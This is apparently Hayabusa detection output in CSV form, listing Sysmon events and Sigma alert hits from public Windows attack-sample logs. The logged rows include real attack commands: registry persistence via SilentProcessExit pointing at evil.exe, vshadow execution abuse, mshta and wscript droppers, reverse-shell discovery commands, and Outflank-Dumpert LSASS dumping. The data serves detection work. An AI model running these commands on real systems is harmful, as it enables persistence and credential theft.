DrvInst.exe ""1"" ""200"" ""STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot12"" """" """" ""6d110b0a3"" ""00000000"" ""000005B8"" ""000004B0"" : Path: C:\Windows\System32\drvinst.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx -2019-05-28 11:14:50.413 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""c:\windows\System32\notepad.exe"" : Path: C:\Windows\System32\notepad.exe : User: IEWIN7\IEUser : Parent Command: vshadow.exe -nw -exec=c:\windows\System32\notepad.exe c:\",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx -2019-06-15 07:22:17.988 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Downloads\a.exe"" : Path: C:\Users\IEUser\Downloads\a.exe : User: IEWIN7\IEUser : Parent Command: 
C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx -2019-06-15 07:22:21.535 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Downloads\a.exe"" : Path: C:\Users\IEUser\Downloads\a.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Users\IEUser\Downloads\a.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx -2019-06-15 07:22:21.535 +09:00,IEWIN7,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx -2019-06-15 07:22:21.535 +09:00,IEWIN7,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx -2019-06-15 07:22:31.957 +09:00,IEWIN7,7,informational,WMI Modules Loaded,,rules/sigma/image_load/sysmon_wmi_module_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx -2019-06-15 07:22:32.222 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"" /stext ""C:\Users\IEUser\AppData\Local\Temp\tmpA185.tmp"" : Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Users\IEUser\Downloads\a.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx -2019-06-15 07:22:47.253 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : 
Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx -2019-06-15 07:22:55.441 +09:00,IEWIN7,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000000 00000040 : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx -2019-06-15 07:22:55.503 +09:00,IEWIN7,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 00000040 ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx -2019-06-15 07:22:55.566 +09:00,IEWIN7,1,informational,Process Creation,Command: winlogon.exe : Path: C:\Windows\System32\winlogon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 00000040 ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx -2019-06-15 07:22:55.707 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx 
-2019-06-15 07:23:06.691 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} : Path: C:\Windows\System32\dllhost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx -2019-06-15 07:23:07.019 +09:00,IEWIN7,1,informational,Process Creation,Command: efsui.exe /efs /keybackup : Path: C:\Windows\System32\efsui.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\lsass.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx -2019-06-15 07:23:07.082 +09:00,IEWIN7,1,informational,Process Creation,Command: atbroker.exe : Path: C:\Windows\System32\AtBroker.exe : User: IEWIN7\IEUser : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx -2019-06-15 07:23:13.894 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\userinit.exe : Path: C:\Windows\System32\userinit.exe : User: IEWIN7\IEUser : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx -2019-06-15 07:23:13.957 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe"" : Path: C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\userinit.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx -2019-06-15 
07:23:13.957 +09:00,IEWIN7,1,high,Logon Scripts (UserInitMprLogonScript),,rules/sigma/process_creation/sysmon_logon_scripts_userinitmprlogonscript_proc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx -2019-06-15 07:23:13.957 +09:00,IEWIN7,1,medium,Suspicious Userinit Child Process,,rules/sigma/process_creation/win_susp_userinit_child.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx -2019-06-15 07:23:13.972 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\Explorer.EXE : Path: C:\Windows\explorer.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\userinit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx -2019-06-15 07:23:15.054 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\VBoxTray.exe"" : Path: C:\Windows\System32\VBoxTray.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx -2019-06-15 07:23:16.592 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe"" : Path: C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx -2019-06-15 07:23:23.405 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe"" : Path: C:\Windows\System32\eventvwr.exe : User: IEWIN7\IEUser : Parent Command: 
C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx -2019-06-15 07:23:26.811 +09:00,IEWIN7,7,informational,WMI Modules Loaded,,rules/sigma/image_load/sysmon_wmi_module_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx -2019-06-15 07:23:26.999 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"" /stext ""C:\Users\IEUser\AppData\Local\Temp\tmp7792.tmp"" : Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx -2019-06-15 07:23:53.358 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} : Path: C:\Windows\System32\dllhost.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx -2019-06-15 16:13:42.294 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\mshta.exe"" ""C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\update.hta"" : Path: C:\Windows\System32\mshta.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Internet Explorer\iexplore.exe"" C:\Users\IEUser\Downloads\update.html",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx -2019-06-15 16:13:42.294 +09:00,IEWIN7,1,high,MSHTA Suspicious 
Execution 01,,rules/sigma/process_creation/win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx -2019-06-15 16:13:42.294 +09:00,IEWIN7,1,high,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation/win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx -2019-06-15 16:13:42.294 +09:00,IEWIN7,1,high,Suspicious MSHTA Process Patterns,,rules/sigma/process_creation/win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx -2019-06-15 16:14:32.809 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} : Path: C:\Windows\System32\dllhost.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx -2019-06-15 16:21:50.488 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Program Files\Internet Explorer\iexplore.exe"" C:\Users\IEUser\Downloads\updatevbs.html : Path: C:\Program Files\Internet Explorer\iexplore.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx -2019-06-15 16:21:51.035 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Program Files\Internet Explorer\iexplore.exe"" SCODEF:540 CREDAT:275457 /prefetch:2 : Path: C:\Program Files\Internet Explorer\iexplore.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Internet Explorer\iexplore.exe"" 
C:\Users\IEUser\Downloads\updatevbs.html",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx -2019-06-15 16:22:05.691 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\WScript.exe"" ""C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\updatevbs.vbs"" : Path: C:\Windows\System32\wscript.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Internet Explorer\iexplore.exe"" C:\Users\IEUser\Downloads\updatevbs.html",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx -2019-06-15 16:22:05.691 +09:00,IEWIN7,1,high,WScript or CScript Dropper,,rules/sigma/process_creation/win_malware_script_dropper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx -2019-06-15 16:22:05.691 +09:00,IEWIN7,1,high,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation/win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx -2019-06-20 02:22:37.897 +09:00,IEWIN7,1,informational,Process Creation,"Command: reg add ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe"" /v GlobalFlag /t REG_DWORD /d 512 : Path: C:\Windows\System32\reg.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx -2019-06-20 02:22:41.709 +09:00,IEWIN7,1,informational,Process Creation,"Command: reg add ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe"" /v ReportingMode /t REG_DWORD /d 1 : Path: C:\Windows\System32\reg.exe : 
User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx -2019-06-20 02:22:41.709 +09:00,IEWIN7,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx -2019-06-20 02:22:41.709 +09:00,IEWIN7,13,critical,Registry Persistence Mechanisms,,rules/sigma/registry_event/sysmon_win_reg_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx -2019-06-20 02:22:41.709 +09:00,IEWIN7,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx -2019-06-20 02:22:43.944 +09:00,IEWIN7,1,informational,Process Creation,"Command: reg add ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe"" /v MonitorProcess /d ""C:\windows\temp\evil.exe"" : Path: C:\Windows\System32\reg.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx -2019-06-20 02:22:43.944 +09:00,IEWIN7,13,critical,Registry Persistence Mechanisms,,rules/sigma/registry_event/sysmon_win_reg_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx -2019-06-20 02:22:45.694 +09:00,IEWIN7,13,critical,Registry Persistence 
Mechanisms,,rules/sigma/registry_event/sysmon_win_reg_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx -2019-06-20 02:22:55.397 +09:00,IEWIN7,1,informational,Process Creation,"Command: notepad : Path: C:\Windows\System32\notepad.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx -2019-06-20 02:22:58.944 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\windows\temp\evil.exe : Path: C:\Windows\Temp\evil.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\werfault.exe"" -s -t 1340 -i 1352 -e 1352 -c 0",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx -2019-06-20 02:23:01.928 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe : Path: C:\Windows\System32\Macromed\Flash\FlashPlayerUpdateService.exe : User: NT AUTHORITY\SYSTEM : Parent Command: taskeng.exe {9AAB3F76-4849-4F03-9560-B020B4D0233D} S-1-5-18:NT AUTHORITY\System:Service:,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx -2019-06-20 02:23:01.990 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe : Path: C:\Windows\System32\Macromed\Flash\FlashPlayerUpdateService.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx -2019-06-20 02:23:02.350 
+09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\Macromed\Flash\FlashUtil32_30_0_0_134_Plugin.exe -check plugin : Path: C:\Windows\System32\Macromed\Flash\FlashUtil32_30_0_0_134_Plugin.exe : User: IEWIN7\IEUser : Parent Command: taskeng.exe {CF661A9C-C1B0-45D5-BC80-11E48F3A0B96} S-1-5-21-3583694148-1414552638-2922671848-1000:IEWIN7\IEUser:Interactive:LUA[1],rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx -2019-06-20 02:23:10.334 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\notepad.exe"" : Path: C:\Windows\System32\notepad.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx -2019-06-20 02:23:11.694 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\windows\temp\evil.exe : Path: C:\Windows\Temp\evil.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\werfault.exe"" -s -t 3020 -i 2396 -e 2396 -c 0",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx -2019-06-20 17:07:42.331 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\NETSTAT.EXE"" -na : Path: C:\Windows\System32\NETSTAT.EXE : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx -2019-06-20 17:07:42.331 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx -2019-06-20 17:07:48.909 
+09:00,IEWIN7,1,informational,Process Creation,"Command: ""cmd"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx -2019-06-20 17:07:48.909 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx -2019-06-20 17:07:48.925 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""cmd"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx -2019-06-20 17:07:48.925 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx -2019-06-20 17:07:52.956 +09:00,IEWIN7,1,informational,Process Creation,"Command: whoami : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: ""cmd""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx -2019-06-20 17:07:52.956 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx -2019-06-20 17:07:52.956 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx -2019-06-20 17:07:58.816 +09:00,IEWIN7,1,informational,Process Creation,"Command: systeminfo : Path: 
C:\Windows\System32\systeminfo.exe : User: IEWIN7\IEUser : Parent Command: ""cmd""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx -2019-06-21 16:35:37.185 +09:00,alice.insecurebank.local,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path : Command: Outflank-Dumpert.exe : Path: C:\Users\administrator\Desktop\x64\Outflank-Dumpert.exe : User: insecurebank\Administrator : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx -2019-06-21 16:35:37.329 +09:00,alice.insecurebank.local,11,critical,Dumpert Process Dumper,,rules/sigma/file_event/file_event_hack_dumpert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx -2019-06-21 16:35:37.329 +09:00,alice.insecurebank.local,11,high,LSASS Process Memory Dump Files,,rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx -2019-06-21 16:35:37.377 +09:00,alice.insecurebank.local,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx -2019-06-21 16:35:50.128 +09:00,alice.insecurebank.local,1,informational,Process Creation,"Command: rundll32.exe .\Outflank-Dumpert-DLL.dll, Dump : Path: C:\Windows\System32\rundll32.exe : User: insecurebank\Administrator : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx -2019-06-21 16:35:50.259 
+09:00,alice.insecurebank.local,11,critical,Dumpert Process Dumper,,rules/sigma/file_event/file_event_hack_dumpert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx -2019-06-21 16:35:50.259 +09:00,alice.insecurebank.local,11,high,LSASS Process Memory Dump Files,,rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx -2019-06-21 16:35:50.264 +09:00,alice.insecurebank.local,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx -2019-06-21 16:35:50.729 +09:00,alice.insecurebank.local,11,critical,Dumpert Process Dumper,,rules/sigma/file_event/file_event_hack_dumpert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx -2019-06-21 16:35:50.729 +09:00,alice.insecurebank.local,11,high,LSASS Process Memory Dump Files,,rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx -2019-06-21 16:35:50.749 +09:00,alice.insecurebank.local,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential 